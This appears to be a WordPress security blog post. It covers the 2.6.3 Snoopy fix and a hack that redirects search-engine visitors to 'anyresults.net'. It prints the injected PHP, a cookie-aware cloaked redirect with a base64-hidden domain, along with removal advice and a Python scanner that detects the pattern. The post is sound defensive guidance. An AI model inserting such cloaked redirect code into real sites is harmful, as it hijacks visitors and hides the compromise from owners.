WordPress 2.6.2 Snoopy Vulnerability

A vulnerability in the Snoopy library was announced today. WordPress uses Snoopy to fetch the feeds shown in the Dashboard. Although this appears to be a low-risk vulnerability for WordPress users, we wanted to get an update out immediately. 2.6.3 is available for download right now. If you don't want to download the whole release to get the security fix, you can download the following two files and copy them over your 2.6.2 installation:

  1. wp-includes/class-snoopy.php
  2. wp-includes/version.php

WordPress AnyResults.net Hack – Search Engine Visits Redirecting to AnyResults.net

Many sites running WordPress blogs have been hacked by a clever, well-hidden PHP injection that redirects every visitor arriving from Google, MSN, Live, AltaVista, Ask, Yahoo and other search engines to 'anyresults.net', a site filled with pay-per-click ads and redirects to other landing pages. The trick works because visiting the site directly, by typing the address or using a bookmark, shows nothing wrong. Only search engine visits are redirected, so many site owners discover the problem late, when they notice large drops in traffic or revenue.

Many blogs and discussions on this provide very little help in finding the exploit. Some blame a plugin file, some the wp_options table in the database; neither was the culprit in this case.

If your blog is affected by this hack, check your wp-blog-header.php file for the following code:

  <?php
  // Referrer fragments the code looks for: search engines plus a few high-traffic sites
  $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
  $ser=0;
  foreach($seref as $ref)
      if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
  // Redirect only when the referrer matched AND the visitor sends no cookies at all
  if($ser=="1" && sizeof($_COOKIE)==0){
      header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/");
      exit;
  }
  ?>

Remove it completely or comment it out.

This code stores the string 'anyresults.net' as the base64 value YW55cmVzdWx0cy5uZXQ=, so searching the files for the domain name turns up nothing, which made the redirect much harder to find. It also fires only when the visitor sends no cookies at all, which is why the site owner, who is logged in and carries WordPress cookies, never sees it.
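The check above can be automated. The following Python script is an added example, not code from the original post or from WordPress: it walks a WordPress directory, decodes every base64_decode("...") string literal it finds in .php files so the hidden domain shows up in plain text, and flags any file that pairs an HTTP_REFERER test with a header("Location: ...") redirect. The sample files it scans are constructed here: wp-blog-header.php carries the snippet from this post, and wp-settings.php stands in for an untouched file and is not real WordPress code.

```python
"""
Added example (not from the original post): walk a WordPress install, decode
every base64_decode("...") literal found in PHP files, and flag files that
combine an HTTP_REFERER check with a header("Location: ...") redirect, which
is the pattern of the anyresults.net injection shown above.
"""
import base64
import os
import re
import tempfile
from pathlib import Path

# base64_decode("...") with a string literal argument: the obfuscation the injection uses.
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
# The two halves of the redirect: a referrer test and a Location header.
REFERER_CHECK = re.compile(r'\$_SERVER\[\s*["\']HTTP_REFERER["\']\s*\]')
LOCATION_HEADER = re.compile(r'header\(\s*["\']Location:')


def decode_b64_literals(source):
    """Return (encoded, decoded) pairs for every base64_decode literal in source."""
    pairs = []
    for match in B64_CALL.finditer(source):
        encoded = match.group(1)
        try:
            decoded = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64; skip it rather than abort the scan
            continue
        pairs.append((encoded, decoded))
    return pairs


def scan_source(source):
    """Return human-readable findings for one file's PHP source (empty if clean)."""
    findings = [f"base64_decode literal {enc!r} decodes to {dec!r}"
                for enc, dec in decode_b64_literals(source)]
    if REFERER_CHECK.search(source) and LOCATION_HEADER.search(source):
        findings.append("HTTP_REFERER check combined with a Location header redirect")
    return findings


def scan_tree(root):
    """Map each suspicious .php path (relative to root) to its findings."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            source = Path(path).read_text(encoding="utf-8", errors="replace")
            findings = scan_source(source)
            if findings:
                results[os.path.relpath(path, root)] = findings
    return results


# Constructed sample files for an offline run. INFECTED is the snippet from the
# post; CLEAN is a stand-in for an untouched file, not real WordPress code.
INFECTED = """<?php
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0;
foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }
?>
"""
CLEAN = """<?php
require_once( dirname(__FILE__) . '/wp-load.php' );
?>
"""


def build_sample_tree():
    """Write the constructed sample files into a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    Path(root, "wp-blog-header.php").write_text(INFECTED, encoding="utf-8")
    Path(root, "wp-settings.php").write_text(CLEAN, encoding="utf-8")
    return root


if __name__ == "__main__":
    for rel_path, findings in scan_tree(build_sample_tree()).items():
        print(rel_path)
        for finding in findings:
            print("  -", finding)
```

To run it against a real install, pass the WordPress root directory to scan_tree(). Every base64 literal is reported, not only the malicious one, so expect to review legitimate hits by hand; the decoded text is printed so that the domain hidden in this injection is visible at a glance.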

It is recommended that you upgrade all of your WordPress sites to the latest stable version immediately. The entry point used to plant this code is not identified here, but the sites being hit were running outdated versions of WordPress, so the urgency of upgrading should be clear.

While seeking solutions I discovered some more good ideas on keeping your WordPress site safe in Matt Cutts' blog post: Three Tips to Protect Your WordPress Installation.
